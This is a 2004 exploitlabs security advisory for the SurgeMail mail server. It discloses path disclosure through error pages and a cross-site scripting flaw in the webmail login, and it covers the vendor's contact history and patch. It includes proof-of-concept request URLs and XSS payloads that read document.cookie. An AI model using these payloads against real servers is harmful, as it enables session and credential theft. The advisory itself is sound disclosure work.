------------------------------------------------------------
        - EXPL-A-2004-002 exploitlabs.com Advisory 028 -
------------------------------------------------------------
                         - Surgemail -



OVERVIEW
========
"SurgeMail is a next generation Mail Server -
Combining features, performance and ease of
use into a single integrated product.
Ideal on Windows NT/2K, or Unix (Linux, Solaris etc)
 and supports all all the standard protocols 
IMAP, POP3, SMTP, SSL, ESMTP."


Surgmail suffers from two basic remote vulnerabilities...

1. Information Disclosure, by providing a non existant filename, the STDERR
is rendered to the user, disclosing physical directory structure.

2. XSS ( cross site scripting ) via the login form, and in particular
the "username" field. This allows for credential theft via externaly
hosted malicous script. This affects both HTTP and HTTPS access vectors.



AFFECTED PRODUCTS
=================
Surge Mail
( Win32 and *nix through versions 1.9 )

WebMail v3.1d Copyright © NetWin Ltd 

http://netwinsite.com/index.html
http://netwinsite.com/overviews.htm
http://netwinsite.com/server/email_server_software.htm


DETAILS
=======
1. Information Disclosure
Surge mail's web based interface reveals physical
directory structure by requesting a non-existant
(404) request.
 

http://x.x.x.x/[non-existant request]

http://x.x.x.x:7080/scripts/
"Could not create process D:\surgemail/scripts/ Access Denied
Is the url correct, check for a log file in the scripts directory
 and run the process in a shell window (D:\surgemail)"

http://x.x.x.x:7080/scripts/err.txt
"Could not create process D:\surgemail/scripts/err.txt File Not Found
Is the url correct, check for a log file in the scripts directory
 and run the process in a shell window (D:\surgemail)"

http://x.x.x.x/scripts/err.txt
CGI did not respond correctly, it probably exited abnormally or the file 
may not exist or have +x access (/usr/local/surgemail/scripts) (err.txt) () 



2. XSS ( cross site scripting )

 The login form username field is vunerable to XSS  


================ snip ========================

http://x.x.x.x:7080/
http://x.x.x.x:7080/<script>alert('Vulnerable')</script>
http://x.x.x.x:7080/<script>alert(document.cookie)</script>

================ snip ========================



SOLUTION
========
Vendor contacted May 16, 2003 support-surgemail@netwinsite.com
Vendor acknowlegement recieved May 17, 2003

Vendor Patch / Version 2.0c released June 2, 2004 
and may be obtained at
ftp://ftp.netwinsite.com/pub/surgemail/beta
http://www.netwinsite.com/surgemail/help/updates.htm


PROOF OF CONCEPT
================
( see DETAILS )


CREDITS
=======
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs

Donnie Werner

mail:	morning_wood@exploitlabs.com
-- 
web:	http://exploitlabs.com
web:	http://zone-h.org